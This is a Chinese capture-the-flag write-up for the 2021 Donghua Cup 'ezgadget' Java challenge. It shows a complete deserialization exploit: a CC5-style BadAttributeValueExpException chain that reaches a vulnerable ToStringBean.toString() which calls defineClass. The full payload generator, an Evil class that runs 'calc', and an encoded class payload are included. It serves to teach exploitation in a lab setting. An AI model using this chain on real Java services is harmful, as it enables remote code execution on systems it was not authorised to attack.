附件传不上来欸,直接看题吧
    首先看路由发现反序列化的点
    image.png
    接着看pom.xml找有无利用的第三方组件
    image.png
    似乎只有spring-boot,然后看其他源码,发现ToStringBean.java#toString()里面有defineClass(),这是好东西哇,在ClassLoader(类加载器)里面提到这是加载字节码的东西,所以目标明确,从readObject()走到toString()再到defineClass(),正好在CC5中有BadAttributeValueExpException调用了toString,所以直接一把梭

    1. package com.yq1ng.ezgadget;
    3. import javax.management.BadAttributeValueExpException;
    4. import java.io.*;
    5. import java.lang.reflect.Field;
    6. import java.net.URLEncoder;
    7. import java.nio.file.Files;
    8. import java.nio.file.Paths;
    9. import java.util.Base64;
    11. /**
    12.  * @author ying
    13.  * @Description 东华杯2021
    14.  * @create 2021-11-10 5:27 PM
    15.  */
    17. public class GetFlag {
    18.         public static void main(String[] args) throws Exception{
    19.             //  利用cc5后半段
    20.             BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
    21.             Class clazz = Class.forName("javax.management.BadAttributeValueExpException");
    23.             Field field = clazz.getDeclaredField("val");
    24.             field.setAccessible(true);
    25.             com.ezgame.ctf.tools.ToStringBean toStringBean = new com.ezgame.ctf.tools.ToStringBean();
    26.             field.set(badAttributeValueExpException,toStringBean);
    28. //            byte[] classByte = Base64.getDecoder().decode("yv66vgAAADQAKQoACAAZCgAaABsIABwKABoAHQcAHgoABQAfBwAgBwAhAQAJdHJhbnNmb3JtAQBy"+"KExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9v"+"cmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylW"+"AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHACIBAKYoTGNvbS9zdW4vb3Jn"+"L2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwv"+"aW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRl"+"cm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAGPGluaXQ+AQADKClWAQAN"+"U3RhY2tNYXBUYWJsZQcAIAcAHgEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAKU291"+"cmNlRmlsZQEACUV2aWwuamF2YQwAEAARBwAjDAAkACUBAA9jbWQgL2MgY2FsYy5leGUMACYAJwEA"+"E2phdmEvbGFuZy9FeGNlcHRpb24MACgAEQEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFs"+"YW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcv"+"YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5n"+"L1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhM"+"amF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD3ByaW50U3RhY2tUcmFjZQAh"+"AAcACAAAAAAABAABAAkACgACAAsAAAAZAAAAAwAAAAGxAAAAAQAMAAAABgABAAAAEAANAAAABAAB"+"AA4AAQAJAA8AAgALAAAAGQAAAAQAAAABsQAAAAEADAAAAAYAAQAAABQADQAAAAQAAQAOAAEAEAAR"+"AAEACwAAAGAAAgACAAAAFiq3AAG4AAISA7YABFenAAhMK7YABrEAAQAEAA0AEAAFAAIADAAAABoA"+"BgAAABYABAAYAA0AHAAQABoAEQAbABUAHQASAAAAEAAC/wAQAAEHABMAAQcAFAQACQAVABYAAQAL"+"AAAAGQAAAAEAAAABsQAAAAEADAAAAAYAAQAAACAAAQAXAAAAAgAY");
    29.             byte[] classByte = Files.readAllBytes(Paths.get("F:\\study\\temp\\target\\classes\\com\\yq1ng\\ezgadget\\Evil.class"));
    30.             clazz = Class.forName("com.ezgame.ctf.tools.ToStringBean");
    31.             field = clazz.getDeclaredField("ClassByte");
    32.             field.setAccessible(true);
    33.             field.set(toStringBean,classByte);
    35.             ByteArrayOutputStream bout = new ByteArrayOutputStream();
    36.             ObjectOutputStream oout = new ObjectOutputStream(bout);
    37.             oout.writeUTF("gadgets");
    38.             oout.writeInt(2021);
    39.             oout.writeObject(badAttributeValueExpException);
    40.             byte[] bytes = bout.toByteArray();
    41.             byte[] encode = Base64.getEncoder().encode(bytes);
    42.             System.out.println(URLEncoder.encode(new String(encode)));
    43.         }
    44. }
    1. package com.yq1ng.ezgadget;
    3. import com.sun.org.apache.xalan.internal.xsltc.DOM;
    4. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
    5. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
    6. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
    7. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
    9. /**
    10.  * @author ying
    11.  * @Description
    12.  * @create 2021-11-10 5:20 PM
    13.  */
    15. public class Evil extends AbstractTranslet {
    16.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    18.     }
    20.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    22.     }
    24.     public Evil() {
    25.         try {
    26.             Runtime.getRuntime().exec("calc");
    27.         }
    28.         catch (Exception ex) {
    29.             ex.printStackTrace();
    30.         }
    31.     }
    33.     public static void main(final String[] array) {
    34.     }
    35. }
    1. //
    2. // Source code recreated from a .class file by IntelliJ IDEA
    3. // (powered by Fernflower decompiler)
    4. //
    6. package com.ezgame.ctf.tools;
    8. import java.io.Serializable;
    10. public class ToStringBean extends ClassLoader implements Serializable {
    11.     private byte[] ClassByte;
    13.     public ToStringBean() {
    14.     }
    16.     public String toString() {
    17.         ToStringBean toStringBean = new ToStringBean();
    18.         Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
    19.         Object var3 = null;
    21.         try {
    22.             var3 = clazz.newInstance();
    23.         } catch (InstantiationException var5) {
    24.             var5.printStackTrace();
    25.         } catch (IllegalAccessException var6) {
    26.             var6.printStackTrace();
    27.         }
    29.         return "enjoy it.";
    30.     }
    31. }